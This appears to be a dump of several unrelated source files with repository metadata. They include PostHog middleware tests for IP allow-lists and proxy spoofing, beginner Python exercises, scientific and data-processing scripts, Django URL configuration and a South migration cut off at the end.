from Decorators import *
from Types.AbstractDihedralType import *
class ImproperDihedral2Type(AbstractDihedralType):
@accepts_compatible_units(None,
None,
None,
None,
None,
units.degrees,
units.kilojoules_per_mole * units.radians**(-2))
def __init__(self, atom1, atom2, atom3, atom4, type, xi, k):
"""
"""
AbstractDihedralType.__init__(self, atom1, atom2, atom3, atom4, type)
self.xi = xi
self.k = k
|
[
"choderaj@mskcc.org"
] |
choderaj@mskcc.org
|
76685f23ac80025d9fc64fa03036df7c4bbdbbbe
|
485816a0a8b86818e4f2cefec517e6316e2252d6
|
/posthog/test/test_middleware.py
|
e7bd0e8275c8ba6c3d46790e80193e5a60a215f4
|
[
"MIT",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
abhijitghate/posthog
|
3647443274aee6431e7fecf6902644a9fa7eb9d8
|
68dc4d2730600efb00d3708fb7fba70d85612760
|
refs/heads/master
| 2023-04-19T15:17:25.033992
| 2021-05-13T09:48:59
| 2021-05-13T09:48:59
| 279,130,099
| 1
| 0
|
MIT
| 2020-07-12T19:04:15
| 2020-07-12T19:04:14
| null |
UTF-8
|
Python
| false
| false
| 6,775
|
py
|
from django.conf import settings
from rest_framework import status
from posthog.test.base import APIBaseTest
class TestAccessMiddleware(APIBaseTest):
CONFIG_AUTO_LOGIN = False
def test_ip_range(self):
"""
        Also test that the capture endpoint is not restricted by ALLOWED_IP_BLOCKS
"""
with self.settings(ALLOWED_IP_BLOCKS=["192.168.0.0/31", "127.0.0.0/25", "128.0.0.1"]):
# not in list
response = self.client.get("/", REMOTE_ADDR="10.0.0.1")
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
self.assertIn(b"IP is not allowed", response.content)
response = self.client.get("/batch/", REMOTE_ADDR="10.0.0.1",)
self.assertEqual(
response.status_code, status.HTTP_400_BAD_REQUEST
) # Check for a bad request exception because it means the middleware didn't block the request
# /31 block
response = self.client.get("/", REMOTE_ADDR="192.168.0.1")
self.assertNotEqual(response.status_code, status.HTTP_403_FORBIDDEN)
self.assertNotIn(b"IP is not allowed", response.content)
response = self.client.get("/", REMOTE_ADDR="192.168.0.2")
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
self.assertIn(b"IP is not allowed", response.content)
response = self.client.get("/batch/", REMOTE_ADDR="192.168.0.1")
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
response = self.client.get("/batch/", REMOTE_ADDR="192.168.0.2")
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
# /24 block
response = self.client.get("/", REMOTE_ADDR="127.0.0.1")
self.assertNotEqual(response.status_code, status.HTTP_403_FORBIDDEN)
self.assertNotIn(b"IP is not allowed", response.content)
response = self.client.get("/", REMOTE_ADDR="127.0.0.100")
self.assertNotEqual(response.status_code, status.HTTP_403_FORBIDDEN)
self.assertNotIn(b"IP is not allowed", response.content)
response = self.client.get("/", REMOTE_ADDR="127.0.0.200")
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
self.assertIn(b"IP is not allowed", response.content)
# precise ip
response = self.client.get("/", REMOTE_ADDR="128.0.0.1")
self.assertNotEqual(response.status_code, status.HTTP_403_FORBIDDEN)
self.assertNotIn(b"IP is not allowed", response.content)
response = self.client.get("/", REMOTE_ADDR="128.0.0.2")
self.assertIn(b"IP is not allowed", response.content)
def test_trusted_proxies(self):
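# A client IP from the allow list should not be blocked when it arrives via X-Forwarded-For through a trusted proxy.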
with self.settings(
ALLOWED_IP_BLOCKS=["192.168.0.0/31", "127.0.0.0/25,128.0.0.1"], USE_X_FORWARDED_HOST=True,
):
with self.settings(TRUSTED_PROXIES="10.0.0.1"):
response = self.client.get("/", REMOTE_ADDR="10.0.0.1", HTTP_X_FORWARDED_FOR="192.168.0.1,10.0.0.1",)
self.assertNotIn(b"IP is not allowed", response.content)
def test_attempt_spoofing(self):
with self.settings(
ALLOWED_IP_BLOCKS=["192.168.0.0/31", "127.0.0.0/25,128.0.0.1"], USE_X_FORWARDED_HOST=True,
):
with self.settings(TRUSTED_PROXIES="10.0.0.1"):
response = self.client.get("/", REMOTE_ADDR="10.0.0.1", HTTP_X_FORWARDED_FOR="192.168.0.1,10.0.0.2",)
self.assertIn(b"IP is not allowed", response.content)
def test_trust_all_proxies(self):
with self.settings(
ALLOWED_IP_BLOCKS=["192.168.0.0/31", "127.0.0.0/25,128.0.0.1"], USE_X_FORWARDED_HOST=True,
):
with self.settings(TRUST_ALL_PROXIES=True):
response = self.client.get("/", REMOTE_ADDR="10.0.0.1", HTTP_X_FORWARDED_FOR="192.168.0.1,10.0.0.1",)
self.assertNotIn(b"IP is not allowed", response.content)
class TestToolbarCookieMiddleware(APIBaseTest):
CONFIG_AUTO_LOGIN = False
def test_logged_out_client(self):
response = self.client.get("/")
self.assertEqual(0, len(response.cookies))
def test_logged_in_client(self):
with self.settings(TOOLBAR_COOKIE_NAME="phtoolbar", TOOLBAR_COOKIE_SECURE=False):
self.client.force_login(self.user)
response = self.client.get("/")
toolbar_cookie = response.cookies[settings.TOOLBAR_COOKIE_NAME]
self.assertEqual(toolbar_cookie.key, settings.TOOLBAR_COOKIE_NAME)
self.assertEqual(toolbar_cookie.value, "yes")
self.assertEqual(toolbar_cookie["path"], "/")
self.assertEqual(toolbar_cookie["samesite"], "None")
self.assertEqual(toolbar_cookie["httponly"], True)
self.assertEqual(toolbar_cookie["domain"], "")
self.assertEqual(toolbar_cookie["comment"], "")
self.assertEqual(toolbar_cookie["secure"], "")
self.assertEqual(toolbar_cookie["max-age"], 31536000)
def test_logged_in_client_secure(self):
with self.settings(TOOLBAR_COOKIE_NAME="phtoolbar", TOOLBAR_COOKIE_SECURE=True):
self.client.force_login(self.user)
response = self.client.get("/")
toolbar_cookie = response.cookies[settings.TOOLBAR_COOKIE_NAME]
self.assertEqual(toolbar_cookie.key, "phtoolbar")
self.assertEqual(toolbar_cookie.value, "yes")
self.assertEqual(toolbar_cookie["path"], "/")
self.assertEqual(toolbar_cookie["samesite"], "None")
self.assertEqual(toolbar_cookie["httponly"], True)
self.assertEqual(toolbar_cookie["domain"], "")
self.assertEqual(toolbar_cookie["comment"], "")
self.assertEqual(toolbar_cookie["secure"], True)
self.assertEqual(toolbar_cookie["max-age"], 31536000)
def test_logout(self):
with self.settings(TOOLBAR_COOKIE_NAME="phtoolbar"):
self.client.force_login(self.user)
response = self.client.get("/")
self.assertEqual(response.cookies[settings.TOOLBAR_COOKIE_NAME].key, "phtoolbar")
self.assertEqual(response.cookies[settings.TOOLBAR_COOKIE_NAME].value, "yes")
self.assertEqual(response.cookies[settings.TOOLBAR_COOKIE_NAME]["max-age"], 31536000)
response = self.client.get("/logout")
self.assertEqual(response.cookies[settings.TOOLBAR_COOKIE_NAME].key, "phtoolbar")
self.assertEqual(response.cookies[settings.TOOLBAR_COOKIE_NAME].value, "")
self.assertEqual(response.cookies[settings.TOOLBAR_COOKIE_NAME]["max-age"], 0)
|
[
"noreply@github.com"
] |
abhijitghate.noreply@github.com
|
3208b05d0da560dca27f9423abf4a82b2b8c2985
|
de24f83a5e3768a2638ebcf13cbe717e75740168
|
/moodledata/vpl_data/30/usersdata/82/9455/submittedfiles/atividade.py
|
c5d3ff8f09f278a98531a889412358d110818bae
|
[] |
no_license
|
rafaelperazzo/programacao-web
|
95643423a35c44613b0f64bed05bd34780fe2436
|
170dd5440afb9ee68a973f3de13a99aa4c735d79
|
refs/heads/master
| 2021-01-12T14:06:25.773146
| 2017-12-22T16:05:45
| 2017-12-22T16:05:45
| 69,566,344
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 192
|
py
|
# -*- coding: utf-8 -*-
from __future__ import division
import math
n=input('Digite o valor de n:')
i=1
j=n
soma=0
while i<=n:
soma=soma+i/j
i=i+1
j=j-1
print('%.5f' % soma)
|
[
"rafael.mota@ufca.edu.br"
] |
rafael.mota@ufca.edu.br
|
9ccd664cded01d384a74b70078226710006213ac
|
cf7fed790b733b9a21ec6c65970e9346dba103f5
|
/opencv/gen_sine_table.py
|
a92197731a8388aa38b098c9704de464791890c8
|
[
"MIT"
] |
permissive
|
CospanDesign/python
|
a582050993efc1e6267683e38dd4665952ec6d40
|
a3d81971621d8deed2f1fc738dce0e6eec0db3a7
|
refs/heads/master
| 2022-06-20T15:01:26.210331
| 2022-05-29T01:13:04
| 2022-05-29T01:13:04
| 43,620,126
| 6
| 3
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,006
|
py
|
#! /usr/bin/env python3
# Copyright (c) 2017 Dave McCoy (dave.mccoy@cospandesign.com)
#
# NAME is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3 of the License, or
# any later version.
#
# NAME is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with NAME; If not, see <http://www.gnu.org/licenses/>.
import sys
import os
import argparse
import numpy as np
#sys.path.append(os.path.abspath(os.path.join(os.path.dirname(__file__), os.pardir)))
NAME = os.path.basename(os.path.realpath(__file__))
DESCRIPTION = "\n" \
"\n" \
"usage: %s [options]\n" % NAME
EPILOG = "\n" \
"\n" \
"Examples:\n" \
"\tSomething\n" \
"\n"
def main(argv):
#Parse out the commandline arguments
parser = argparse.ArgumentParser(
formatter_class=argparse.RawDescriptionHelpFormatter,
description=DESCRIPTION,
epilog=EPILOG
)
parser.add_argument("-t", "--test",
nargs=1,
default=["something"])
parser.add_argument("-d", "--debug",
action="store_true",
help="Enable Debug Messages")
args = parser.parse_args()
print ("Running Script: %s" % NAME)
if args.debug:
print ("test: %s" % str(args.test[0]))
sine_table = []
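# Tabulate sin(x) every 0.5 degrees from 0 to 89.5 degrees (180 samples), then write the values to sine_table_float.txt.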
for i in range(0, 180):
j = i / 2
#print ("%f" % (j))
k = np.deg2rad(j)
sine_table.append(np.sin(k))
with open("sine_table_float.txt", 'w') as f:
for d in sine_table:
f.write("%f\n" % d)
if __name__ == "__main__":
main(sys.argv)
|
[
"cospan@gmail.com"
] |
cospan@gmail.com
|
60e9881d0417bfd779ab8f261e6d4a6eba1be611
|
f2ee087b896000ce500ecdb50d6af3a81c9ea67a
|
/ex16_read_write_file/ex16.py
|
21af6acf9f67a01ada06dcad48bed4c2ac91e3b0
|
[] |
no_license
|
billgoo/Learn_Python_the_Hard_Way
|
5a029223701f1fd6929afbe51b7cd3bfff3e7410
|
a280b4110a10d41edda2e90c817f7a8fbc0cecd6
|
refs/heads/master
| 2020-05-04T17:39:42.275970
| 2019-08-14T14:28:35
| 2019-08-14T14:28:35
| 179,321,167
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,665
|
py
|
"""
========= ===============================================================
Character Meaning
--------- ---------------------------------------------------------------
'r' open for reading (default)
'w' open for writing, truncating the file first
'x' create a new file and open it for writing
'a' open for writing, appending to the end of the file if it exists
'b' binary mode
't' text mode (default)
'+' open a disk file for updating (reading and writing)
'U' universal newline mode (deprecated)
========= ===============================================================
"""
from sys import argv
script, filename = argv
print(f"We're going to erase {filename}.")
print("If you don't want that, hit CTRL-C (^C).") # KeyboardInterrupt
print("If you do want that, hit RETURN.")
input("?")
print("Opening the file...")
target = open(filename, 'w') # open tries to be safe by making you explicitly say you want to write a file
print("Truncating the file. Goodbye!")
# no need truncate because 'w' mode will first do a truncate then do writing
target.truncate()
print("Now I'm going to ask you for three lines.")
line1 = input("line 1: ")
line2 = input("line 2: ")
line3 = input("line 3: ")
print("I'm going to write these to the file.")
'''
target.write(line1)
target.write("\n")
target.write(line2)
target.write("\n")
target.write(line3)
target.write("\n")
'''
# study drill
target.write(f"{line1}\n{line2}\n{line3}\n")
print("And finally, we close it.")
target.close()
txt = open(filename)
print(f"Here's your file {filename}:")
print(txt.read())
txt.close()
|
[
"billgoo0813@gmail.com"
] |
billgoo0813@gmail.com
|
ae8c313063f63d8ca46adb08c54ed25e9c15a211
|
6968c7f9d2b20b5296663829f99a27d184a59fc1
|
/experiments/explorations/experiments/experiment_000202/repetition_000002/calc_statistics_per_repetition.py
|
782a2e55a6ea5672f1258b531b384649ad3979d5
|
[
"MIT"
] |
permissive
|
flowersteam/automated_discovery_of_lenia_patterns
|
d42dff37323d51732571b33845c0562d844f498f
|
97cc7cde2120fa95225d1e470e00b8aa8c034e97
|
refs/heads/master
| 2020-06-29T07:08:58.404541
| 2020-05-14T07:37:10
| 2020-05-14T07:37:10
| 200,470,902
| 13
| 2
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,282
|
py
|
import exputils
import autodisc as ad
import os
import imageio
import numpy as np
import torch
import importlib
from torch.autograd import Variable
from sklearn.manifold import TSNE
tsne = TSNE(n_components=2, init='pca', random_state=0)
def collect_final_observation(explorer):
data = dict()
for run_data in explorer.data:
if run_data.observations is not None and len(run_data.observations.states) > 0:
# rescale values from [0 1] to [0 255] and convert to uint8 for saving as bw image
img_data = run_data.observations.states[-1] * 255
img_data = img_data.astype(np.uint8)
png_image = imageio.imwrite(
imageio.RETURN_BYTES,
img_data,
format='PNG-PIL')
data['{:06d}.png'.format(run_data.id)] = png_image
return data
def collect_observations(explorer):
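# Save the observed state at a fixed set of timesteps for every run as 8-bit greyscale PNG bytes, keyed by run id and timestep.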
timestamps = [0, 24, 49, 74, 99, 124, 149, 174, 199]
data = dict()
for run_data in explorer.data:
if run_data.observations is not None and len(run_data.observations.states) > 0:
for timestamp in timestamps:
# rescale values from [0 1] to [0 255] and convert to uint8 for saving as bw image
img_data = run_data.observations.states[timestamp] * 255
img_data = img_data.astype(np.uint8)
png_image = imageio.imwrite(
imageio.RETURN_BYTES,
img_data,
format='PNG-PIL')
data['{:06d}_{:06d}.png'.format(run_data.id, timestamp)] = png_image
return data
def collect_representation(explorer):
data = dict()
data_representations = []
n_runs = explorer.data.__len__()
if hasattr(explorer.config.goal_space_representation, 'type') and explorer.config.goal_space_representation.type == 'pytorchnnrepresentation':
if type(explorer).__name__.lower() == 'goalspaceexplorer':
explorer_type = 'pretrainVAE'
elif type(explorer).__name__.lower() == 'onlinelearninggoalexplorer':
explorer_type = 'onlineVAE'
model = explorer.goal_space_representation.model
n_dims_goal_space = model.n_latents
representation_legend = ['dim {}'.format(dim) for dim in range(n_dims_goal_space)]
else:
explorer_type = 'HF'
model = None
representation_legend = explorer.config.goal_space_representation.config.statistics
n_dims_goal_space = len(explorer.config.goal_space_representation.config.statistics)
for run_data in explorer.data:
if run_data.observations is not None and len(run_data.observations.states) > 0:
# fixed representation stored in run_data.reached goal
if explorer_type == 'HF' or explorer_type == 'pretrainVAE': #
data_representations.append(run_data.reached_goal)
# online version: recompute the reached goal with last trained VAE
elif explorer_type == 'onlineVAE':
final_observation = run_data.observations.states[-1]
input_img = Variable(torch.from_numpy(final_observation).unsqueeze(0).unsqueeze(0).float())
outputs = model(input_img)
representation = outputs['mu'].cpu().data.numpy().reshape(n_dims_goal_space)
data_representations.append(representation)
data['representation_type'] = explorer_type
data['n_runs'] = n_runs
data['n_dims_goal_space'] = n_dims_goal_space
data['representation_legend'] = representation_legend
data['coordinates_in_goal_space'] = data_representations
data['coordinates_in_tsne_space'] = tsne.fit_transform(np.asarray(data_representations))
return data
# def load_data(experiment_directory):
#
# dh = ad.ExplorationDataHandler.create(directory=os.path.join(experiment_directory, 'results'))
# dh.load(load_observations=False, verbose=True)
#
# dh.config.save_automatic = False
# dh.config.load_observations = True
# dh.config.memory_size_observations = 1
#
# return dh
def load_explorer(experiment_directory):
# load the full explorer without observations and add its config
explorer = ad.explorers.GoalSpaceExplorer.load_explorer(os.path.join(experiment_directory, 'results'), run_ids=[], load_observations=False, verbose=False)
explorer.data.config.load_observations = True
explorer.data.config.memory_size_observations = 1
spec = importlib.util.spec_from_file_location('experiment_config', os.path.join(experiment_directory, 'experiment_config.py'))
experiment_config_module = importlib.util.module_from_spec(spec)
spec.loader.exec_module(experiment_config_module)
explorer.config = experiment_config_module.get_explorer_config()
return explorer
if __name__ == '__main__':
experiments = '.'
statistics = [('final_observation', collect_final_observation, 'zip'),
('observations', collect_observations, 'zip'),
('representations', collect_representation),
]
exputils.calc_experiment_statistics(statistics, load_explorer, experiments, recalculate_statistics=False, verbose=True)
|
[
"chris.reinke@inria.fr"
] |
chris.reinke@inria.fr
|
667d3a55f26dcbea425733e4d22f03d40b58aea2
|
8f26514c451e2398d5e3688c184ea74d1dad21b2
|
/month_01/test_01/test_02.py
|
60b70e67643224bf76ad67e8d5c2bc33fc6e5eb3
|
[] |
no_license
|
CircularWorld/Python_exercise
|
25e7aebe45b4d2ee4e3e3afded082c56483117de
|
96d4d9c5c626f418803f44584c5350b7ce514368
|
refs/heads/master
| 2022-11-21T07:29:39.054971
| 2020-07-20T10:12:24
| 2020-07-20T10:12:24
| 281,081,559
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 742
|
py
|
'''
2. Requirement: read a month and a year from the terminal and print the number of days in that month.
Months 1, 3, 5, 7, 8, 10 and 12 have 31 days.
February has 28 days in a common year and 29 days in a leap year.
Months 4, 6, 9 and 11 have 30 days.
Steps: read the year and month from the terminal, decide with the logic above, and display the day count.
'''
month = int(input('请输入月份:'))
year = int(input("请输入年份:"))
if month in range(1,13):
if month in (4, 6, 9, 11):
print(f"{year}年{month:02}月有30天")
elif month == 2:
if year % 4 == 0 and year % 100 != 0 or year % 400 == 0:
print(f'{year}是闰年,二月有29天')
else:
print(f'{year}是平年,二月有28天')
else:
print(f"{year}年{month:02}月有31天")
else:
print("输入有误")
|
[
"jiayuhaowork@163.com"
] |
jiayuhaowork@163.com
|
4f7885709411c1849cb738566eade86235d66115
|
906ca170744eb2e075b7236814f2137a0283966d
|
/highFreq/subarraySumClosest.py
|
375a0b7543a6c12ebb1706033df97221ba3ac4fe
|
[] |
no_license
|
logancyang/lintcode
|
815f893ee970d760403b409f2adcb11627ce917e
|
c541fa91b2187391320a8a1dd3e2ca75041b3dab
|
refs/heads/master
| 2021-05-30T14:03:28.795033
| 2015-10-26T19:50:45
| 2015-10-26T19:50:45
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,259
|
py
|
# subarraySumClosest: http://www.lintcode.com/en/problem/subarray-sum-closest/
class Solution:
"""
@param nums: A list of integers
@return: A list of integers includes the index of the first number
and the index of the last number
"""
# brute force O(n^3)
def subarraySumClosestBrute(self, nums):
result = [0, 0]
if nums is None or len(nums) <= 1:
return result
min_dist = float("inf")
# does allow [i, i], a single element as result
for i in xrange(len(nums)):
if abs(nums[i]) < min_dist:
min_dist = abs(nums[i])
result = [i, i]
# this part is O(n^3), too slow
for i in xrange(len(nums)):
for j in xrange(i+1, len(nums)):
tmp_sum = sum(nums[i:j+1])
distance = abs(tmp_sum)
if distance < min_dist:
min_dist = distance
result = [i, j]
return result
def subarraySumClosest(self, nums):
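# O(n log n) approach: sort the prefix sums; the pair of prefix sums with the smallest difference bounds the subarray whose sum is closest to zero.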
result = [0, 0]
if nums is None or len(nums) <= 1:
return result
min_dist = float("inf")
# does allow [i, i], a single element as result
for i in xrange(len(nums)):
if abs(nums[i]) < min_dist:
min_dist = abs(nums[i])
result = [i, i]
# compute prefix_sum[i] = sum(nums[:i+1]), O(n)
accumulator = 0
pair_sum_ind = []
for i in xrange(len(nums)):
accumulator += nums[i]
# accumulator is prefix_sum[i], i inclusive
pair_sum_ind.append((accumulator, i))
pair_sum_ind.sort(key=lambda tup: tup[0])
min_diff = float("inf")
for i in xrange(1, len(nums)):
diff = abs(pair_sum_ind[i][0] - pair_sum_ind[i-1][0])
if diff < min_diff:
min_diff = diff
result = [pair_sum_ind[i][1], pair_sum_ind[i-1][1]]
result.sort()
# since prefix_sum[j] - prefix_sum[i] refers to subarray sum i+1 to j
# the smaller index in prefix_sum should + 1
result[0] = result[0] + 1
return result
A = [-3, 1, 1, -3, 5]
Sol = Solution()
print Sol.subarraySumClosest(A)
|
[
"logan1934@gmail.com"
] |
logan1934@gmail.com
|
c56498fc4dae80612f8baae4f506c36ed59b0171
|
b39d9ef9175077ac6f03b66d97b073d85b6bc4d0
|
/Benzylpenicillin_Panpharma_powder_for_solution_for_injection_or_infusion_SmPC.py
|
69089c71ae727141e3d4f4acc96f228c2a5007ba
|
[] |
no_license
|
urudaro/data-ue
|
2d840fdce8ba7e759b5551cb3ee277d046464fe0
|
176c57533b66754ee05a96a7429c3e610188e4aa
|
refs/heads/master
| 2021-01-22T12:02:16.931087
| 2013-07-16T14:05:41
| 2013-07-16T14:05:41
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 511
|
py
|
{'_data': [['Uncommon',
[['General',
u'(>1/1 000 till Blodet och lymfsystemet: eosinofili < 1/100): Hud och subkutan v\xe4vnad: urtikaria']]],
['Rare',
[['General',
u'< 1/1 000): anafylaktiska reaktioner. Blodet och lymfsystemet: agranulocytos, hemolytisk anemi, leukopeni. Magtarmkanalen: diarr\xe9 orsakad av Clostridium difficile.']]],
['Unknown', [['General', u'tromboflebit']]]],
'_pages': [2, 3],
u'_rank': 3,
u'_type': u'LSFU'}
|
[
"daro@daro-ThinkPad-X220.(none)"
] |
daro@daro-ThinkPad-X220.(none)
|
b7bad42217740964a6c56c458b83e77dcb6f7ac0
|
22102fe3aadaabb967b9a0e33af5ea624afdaa38
|
/merge.py
|
6c48c87b8644f6c9004bdadef6fdc3dcc8e4f93d
|
[
"MIT"
] |
permissive
|
tecoholic/Election2021
|
1c840a0e7ba23c885ca07ab9e676087fb312189f
|
0b3fb8930d09883f5b58584f6f14b02d30788cbf
|
refs/heads/main
| 2023-04-30T22:20:37.406868
| 2021-05-14T11:17:16
| 2021-05-14T11:17:16
| 363,843,846
| 3
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,297
|
py
|
import os
import pandas as pd
states = {
"AS": 126,
"KL": 140,
"PY": 30,
"TN": 234,
"WB": 294
}
def get_code(party):
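# Build a short party code: "None of the above" becomes NOTA; otherwise take the first letter of each word, keeping parenthesised parts such as "(Marxist)" as "(M)".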
if party.lower() == "none of the above":
return "NOTA"
party = party.replace("of ", "") # handle CPIM
parts = party.split(" ")
parts = [p.strip() for p in parts]
return "".join(p[0] if not p.startswith("(") else p[0:2]+p[-1] for p in parts).upper()
def main():
for state in states:
print("Merging files of ", state)
base_dir = os.path.join("may2021", state)
df = None
for i in range(1, states[state] + 1):
filename = os.path.join(base_dir, f"{i}.csv")
try:
data = pd.read_csv(filename)
except FileNotFoundError:
print("Cannot find file: ", filename)
continue
data["AC_NO"] = i
data["Position"] = data["Total Votes"].rank(
ascending=False).astype('int')
data["Party Code"] = data["Party"].apply(get_code)
if df is None:
df = data
else:
df = df.append(data)
fname = os.path.join(base_dir, "all_candidate.csv")
df.to_csv(fname, index=False)
if __name__ == "__main__":
main()
|
[
"arun@arunmozhi.in"
] |
arun@arunmozhi.in
|
450884b464f60b3e241efe035f78dab576018545
|
56aa30f949f9e66bce9b7351d72cf76a65e8cd33
|
/config/urls.py
|
486d4479c5a6cb420fffdd8d1f3b3df2f07eba70
|
[
"MIT"
] |
permissive
|
bfssi-forest-dussault/food_list_db
|
5684677aa9df6cd30fd81ae4a16940af34b32190
|
76d2d56a9948f41cf67f5a1c6612c2726bd0b8b7
|
refs/heads/master
| 2022-12-11T22:38:49.250432
| 2020-09-10T20:17:10
| 2020-09-10T20:17:10
| 294,507,579
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,886
|
py
|
from django.conf import settings
from django.conf.urls.static import static
from django.contrib import admin
from django.urls import include, path
from django.views import defaults as default_views
from django.views.generic import TemplateView
from rest_framework.authtoken.views import obtain_auth_token
urlpatterns = [
path("", TemplateView.as_view(template_name="pages/home.html"), name="home"),
path(
"about/", TemplateView.as_view(template_name="pages/about.html"), name="about"
),
# Django Admin, use {% url 'admin:index' %}
path(settings.ADMIN_URL, admin.site.urls),
# User management
path("users/", include("food_list_db.users.urls", namespace="users")),
path("accounts/", include("allauth.urls")),
# Your stuff: custom urls includes go here
] + static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
# API URLS
urlpatterns += [
# API base url
path("api/", include("config.api_router")),
# DRF auth token
path("auth-token/", obtain_auth_token),
]
if settings.DEBUG:
# This allows the error pages to be debugged during development, just visit
# these URLs in the browser to see what these error pages look like.
urlpatterns += [
path(
"400/",
default_views.bad_request,
kwargs={"exception": Exception("Bad Request!")},
),
path(
"403/",
default_views.permission_denied,
kwargs={"exception": Exception("Permission Denied")},
),
path(
"404/",
default_views.page_not_found,
kwargs={"exception": Exception("Page not Found")},
),
path("500/", default_views.server_error),
]
if "debug_toolbar" in settings.INSTALLED_APPS:
import debug_toolbar
urlpatterns = [path("__debug__/", include(debug_toolbar.urls))] + urlpatterns
|
[
"forest.dussault@canada.ca"
] |
forest.dussault@canada.ca
|
1cb30c9e269871d07348485c6437fce3c01a5415
|
c4c159a21d2f1ea0d7dfaa965aeff01c8ef70dce
|
/flask/flaskenv/Lib/site-packages/pip/_vendor/msgpack/fallback.py
|
dd93d22d4040925980e877b62a2e0b299673c4bd
|
[] |
no_license
|
AhsonAslam/webapi
|
54cf7466aac4685da1105f9fb84c686e38f92121
|
1b2bfa4614e7afdc57c9210b0674506ea70b20b5
|
refs/heads/master
| 2020-07-27T06:05:36.057953
| 2019-09-17T06:35:33
| 2019-09-17T06:35:33
| 208,895,450
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 130
|
py
|
version https://git-lfs.github.com/spec/v1
oid sha256:f85297381085e0252cf5010ea8096cb08f88640d230516b6ed589e1429e0302e
size 37491
|
[
"github@cuba12345"
] |
github@cuba12345
|
b2fb7e9429aba97f24de724038516d82b01d2628
|
c35b1d9dd99c7b0ad3e8bee3293df7042f9ae39a
|
/flatpages_plus/migrations/0006_auto__add_field_flatpage_photo.py
|
aafdf685ac68e4d45ca808587c1bf1d9451669dc
|
[
"MIT"
] |
permissive
|
grengojbo/django-flatpages-plus
|
467b2e82d3f2d3c71629ddab5288e1416e5ddeda
|
29af987565dd4c87fa3b0751105b5521e2690374
|
refs/heads/master
| 2020-12-24T20:42:23.064557
| 2014-03-02T17:29:22
| 2014-03-02T17:29:22
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,533
|
py
|
# -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding field 'FlatPage.photo'
db.add_column('flatpages_plus_flatpage', 'photo',
self.gf('sorl.thumbnail.fields.ImageField')(max_length=255, null=True, blank=True),
keep_default=False)
def backwards(self, orm):
# Deleting field 'FlatPage.photo'
db.delete_column('flatpages_plus_flatpage', 'photo')
models = {
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'flatpages_plus.categories': {
'Meta': {'object_name': 'Categories'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_enable': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '80'}),
'slug': ('django.db.models.fields.CharField', [], {'max_length': '250'})
},
'flatpages_plus.flatpage': {
'Meta': {'ordering': "('url',)", 'object_name': 'FlatPage'},
